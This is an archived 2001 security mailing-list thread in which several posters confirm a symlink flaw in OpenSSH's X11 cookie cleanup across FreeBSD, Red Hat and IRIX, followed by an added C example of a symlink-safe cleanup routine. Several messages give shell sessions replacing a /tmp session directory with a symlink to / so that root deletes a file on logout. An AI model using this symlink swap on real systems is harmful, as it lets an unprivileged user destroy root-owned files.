Tomas Ericsson <teat_private>

The vulnerability works perfectly for me:

sshd version OpenSSH_2.3.0 greenat_private 20010321

# uname -a
FreeBSD myhost 4.3-RELEASE FreeBSD 4.3-RELEASE #0: Sun Apr 22 01:05:25 GMT 2001 rootat_private:/usr/src/sys/compile/GENERIC alpha

[root@myhost root]# echo "testing">/cookies
[root@myhost root]# ls -l /cookies
-rw-r--r-- 1 root wheel 8 Jun 5 01:48 /cookies
[root@myhost root]# ssh -l te myhost
[te@myhost te]# rm -rf /tmp/ssh-1i24iea5
[te@myhost te]# ln -s / /tmp/ssh-1i24iea5
[te@myhost te]# logout
[root@myhost root]# ls -l /cookies
ls: /cookies: No such file or directory


Shannon Lee <shannonat_private>

reproduced with OpenSSH_2.3.0p1 on redhat 6.2.


TE <teat_private>

This vulnerability works fine on both RedHat 7.1 & 7.0 with the latest
updated packages from RedHat installed.

RH71# uname -a
Linux host1 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
RH71# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-5

RH70# uname -a
Linux host2 2.2.19-7.0.1 #1 Tue Apr 10 01:56:16 EDT 2001 i686 unknown
RH70# rpm -qa|grep openssh-server
openssh-server-2.5.2p2-1.7.2


"David Thiel" <dthielat_private>

I tested this on 4.3-RELEASE, and was successful.

SSH Version OpenSSH_2.3.0 greenat_private 20010321


KF <dotslashat_private>

Works on my box

[root@bounce dotslash]# cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)
root@bounce dotslash]# ssh -V
SSH Version OpenSSH_2.1.1, protocol versions 1.5/2.0.
Compiled with SSL (0x0090581f).


Jan-Frode Myklebust <janfrodeat_private>

I just tested with OpenSSH_2.5.2p2 on RedHat 7.0, and OpenSSH_2.9p1 on
IRIX 6.5 and both are vulnerable to this. I used protocol version 2 on
both machines.


Luciano Miguel Ferreira Rocha <strangeat_private>

Confirmed on RedHat 7.0 w/ OpenSSH 2.5.2p1. It needs, of course, to have
X forwarding activated.


"Golden_Eternity" <bhodiat_private>

I tried to reproduce this on a system running ssh 2.4.0, but I was unable
to locate the /tmp/ssh-* directory.
What version of ssh were you using when you discovered this?

[test@shiva test]$ ssh test@localhost
warning: Need basic cursor movement capablity, using vt100
test's password:
Authentication successful.
Last login: Mon Jun 04 2001 10:42:08 -0700
No mail.
[test@shiva test]$ ls -l /tmp/
total 12
drwxr-xr-x 2 root root 12288 Apr 8 11:59 lost+found
[test@shiva test]$


"Schlosser, Matt D." <mschlosserat_private>

On the contrary, it just takes another form:

[root@bob /root]# touch /cookies;ls /cookies
/cookies
[root@bob /root]# ssh zen@localhost
zen@localhost's password:
[zen@bob zen]$ rm -r /tmp/orbit-zen/; ln -s / /tmp/orbit-zen
[zen@bob zen]$ logout
Connection to localhost closed.
[root@bob /root]# ls /cookies
/bin/ls: /cookies: No such file or directory

--
Elias Levy
SecurityFocus.com
http://www.securityfocus.com/
Si vis pacem, para bellum
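
Each reproduction above swaps a per-session directory under /tmp for a symlink before logout, after which the cleanup removes `cookies` from wherever the link points. The C below is an added example, not part of the original messages and not OpenSSH code; `safe_session_unlink`, `run_scenario` and the constructed paths are hypothetical and show a cleanup that refuses a symlinked or foreign-owned directory.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper, not OpenSSH code: remove `name` from session directory
 * `dir` without following a symlink planted at `dir`. Returns 0 or -1. */
int safe_session_unlink(const char *dir, const char *name, uid_t owner)
{
    struct stat st;
    int rc = -1;
    /* O_NOFOLLOW: open() fails if the last path component is a symlink. */
    int dfd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (dfd < 0)
        return -1;
    /* Check the opened object, not the path, then unlink relative to it. */
    if (fstat(dfd, &st) == 0 && st.st_uid == owner && (st.st_mode & 077) == 0 &&
        (unlinkat(dfd, name, 0) == 0 || errno == ENOENT))
        rc = 0;
    close(dfd);
    return rc;
}

static void touch(const char *p) { int fd = open(p, O_CREAT | O_WRONLY, 0600); if (fd >= 0) close(fd); }

/* Constructed scenario in a fresh mkdtemp() directory. Returns bit flags:
 * 1 = real session dir cleaned, 2 = symlinked dir refused, 4 = target file kept. */
int run_scenario(void)
{
    char base[] = "/tmp/sess-demo-XXXXXX", sess[64], victim[64], own[80], other[80];
    int flags = 0;
    if (mkdtemp(base) == NULL) return -1;
    snprintf(sess, sizeof sess, "%s/ssh-demo", base);
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(own, sizeof own, "%s/cookies", sess);
    snprintf(other, sizeof other, "%s/cookies", victim);
    mkdir(sess, 0700); mkdir(victim, 0700);
    touch(own); touch(other);              /* `other` stands in for /cookies */
    if (safe_session_unlink(sess, "cookies", getuid()) == 0 && access(own, F_OK) != 0) flags |= 1;
    if (rmdir(sess) != 0 || symlink(victim, sess) != 0) return -1;  /* the swap from the thread */
    if (safe_session_unlink(sess, "cookies", getuid()) != 0) flags |= 2;
    if (access(other, F_OK) == 0) flags |= 4;
    unlink(other); unlink(sess); rmdir(victim); rmdir(base);   /* tidy up */
    return flags;
}
```

In the constructed scenario the symlink target is owned by the same user with mode 0700, so only the `O_NOFOLLOW` open stops the deletion; the ownership and mode checks are a second layer for targets such as `/`.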
This archive was generated by hypermail 2b30 : Tue Jun 05 2001 - 14:42:58 PDT